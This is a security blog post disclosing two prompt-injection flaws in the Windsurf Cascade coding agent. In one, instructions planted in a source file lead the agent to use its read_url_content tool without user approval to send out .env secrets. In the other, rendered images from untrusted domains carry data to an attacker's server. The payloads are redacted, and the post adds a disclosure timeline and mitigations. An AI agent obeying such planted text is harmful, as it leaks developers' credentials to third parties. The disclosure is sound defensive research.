Hijacking Windsurf: How Prompt Injection Leaks Developer Secrets

Posted on Aug 21, 2025

#llm #agents #month of ai bugs

This is the first post in a series exploring security vulnerabilities in Windsurf. If you are unfamiliar with Windsurf, it is a fork of VS Code and the coding agent is called Windsurf Cascade.

The attack vectors we will explore today allow an adversary during an indirect prompt injection to exfiltrate data from the developer’s machine.

These vulnerabilities are a great example of Simon Willison’s lethal trifecta pattern.

Overall, the security vulnerability reporting experience with Windsurf has not been great. All findings were responsibly disclosed on May 30, 2025, and receipt was acknowledged a few days later. However, all further inquiries regarding bug status or fixes remain unanswered. The recent business disruptions and departure of CEO and core team members certainly put Windsurf in the news.

Since Windsurf has been unresponsive and these high-severity vulnerabilities allow the exfiltration of sensitive information from developers, this post will not disclose all technical details and prompt injection payloads. Hopefully, Windsurf will eventually address these deficiencies.

Update: Windsurf reached out that they will be working on fixes, although no ETA yet.

Let’s explore this in detail.

Windsurf System Prompt

When looking at a new system, I always take a peek at the system prompt first. I’m looking for tools that might be able to be invoked during a prompt injection attack. Sometimes there are also other interesting tidbits present.

Here is a snippet of the system prompt:

You can find the Windsurf Cascade system prompt here.

One thing that stood out to me right away was the read_url_content tool.

Attack Vector 1: Tools as Data Exfiltration Vectors

As the name read_url_content suggests, this tool allows Windsurf to connect to a website and read data from it. However, a reading capability can also serve as a data exfiltration channel as part of the outbound HTTP request. And this tool does not require user approval, so it can be successfully invoked by an adversary during a prompt injection attack.

As a result, an attacker can exploit this during an indirect prompt injection attack - without requiring user confirmation.

Exploit Demonstration

The prompt injection exploit for this demo is stored in a source code file. This represents one plausible attack vector, but certainly not the only one!

Now, when the developer analyzes the file with Windsurf Cascade it will attack and exploit the AI agent and exfiltrate the contents of the .env file using the read_url_content tool.

The above screenshot shows how by simply analyzing a file with Windsurf, the text within it can hijack Windsurf Cascade to exfiltrate sensitive information from the developer’s workstation.

Video Demonstration Proof-of-Concept

This video shows how such an exploit chain looks end-to-end:

Prompt Injection Payload

This is the text in the beginning of the source code file:

<redacted for now, as this is not fixed>

With this simple proof-of-concept payload, the AI agent is hijacked to exfiltrate sensitive environment variables and other information as it analyzes the file, all without requiring user approval

Attack Vector 2: Image Rendering

The second attack vector is quite similar to a vulnerability I found in GitHub Copilot last year, which Microsoft has since fixed. You can read up details here.

Image rendering from untrusted domains is actually one of the most common AI application security vulnerabilities to be aware of. We have seen dozens of examples of this vulnerability over the last two+ years.

Exploit Demonstration

As we have shown with many similar attacks over the last 2+ years this does not require a human in the loop and leads to data leakage when an application renders images from untrusted domains.

To keep things short in this post, the following screenshot shows the end to end exploit chain in a single screenshot:

This shows how Windsurf is hijacked and exfiltrates sensitive information from the developer’s workstation to a third-party server.

Video Demonstration Proof-of-Concept

Prompt Injection Payload

This is the text in the beginning of the source code file:

<redacted for now, as this is not fixed>

That’s all that was needed to hijack Windsurf Cascade.

Responsible Disclosure

These vulnerabilities were disclosed to Windsurf on May 30, 2025, and receipt acknowledged by Windsurf a few days later. However, all further inquiries around triage, bug status or fixes remain unanswered.

Hence, disclosing this publicly after three months seems the best approach to raise awareness and educate customers and users about these high-severity vulnerabilities.

Update: Windsurf reached out that they will be working on fixes, although no ETA yet.

Mitigations

Require a human-in-the-loop before invoking the read_url_content tool with untrusted servers
Consider an allow-list of trusted domains that can be read from securely without user approval
Do not render images/hyperlinks to untrusted domains. VS Code has an allow list of trusted domains, so it might be best to integrate with that feature
Also, do not automatically navigate to clickable hyperlinks (e.g. phishing attacks)
If you are a customer of Windsurf, I suggest reaching out to your account manager to inquire about these high-severity vulnerabilites to raise awareness and get them fixed

Conclusion

Windsurf Cascade is vulnerable to prompt injection and since there is no deterministic solution to fix prompt injection itself, security has to be enforced downstream of LLM output.

As demonstrated, weaknesses in tool invocation and image rendering allow a third-party attacker to embed malicious instructions into source code, websites, or even through RAG poisoning. When Cascade analyzes such content, it becomes a “confused deputy”, potentially leading to data exfiltration.

Embrace The Red

Hijacking Windsurf: How Prompt Injection Leaks Developer Secrets

Windsurf System Prompt

Attack Vector 1: Tools as Data Exfiltration Vectors

Exploit Demonstration

Video Demonstration Proof-of-Concept

Prompt Injection Payload

Attack Vector 2: Image Rendering

Exploit Demonstration

Video Demonstration Proof-of-Concept

Prompt Injection Payload

Responsible Disclosure

Mitigations

Conclusion

References